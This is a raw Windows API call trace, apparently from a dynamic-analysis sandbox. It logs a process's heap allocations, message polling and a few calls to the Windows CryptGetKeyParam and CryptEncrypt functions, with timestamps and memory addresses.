RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.229] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.230] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0031.231] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.231] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.231] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.233] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.233] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.235] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.235] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.235] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.235] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.235] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.235] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.236] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.236] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.236] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.236] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.236] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.236] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.236] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.236] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0031.236] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.237] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1710f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17110) returned 1 [0031.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.237] CharLowerBuffW (in: lpsz="byte[94481]", cchLength=0xb | out: lpsz="byte[94481]") returned 0xb [0031.237] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 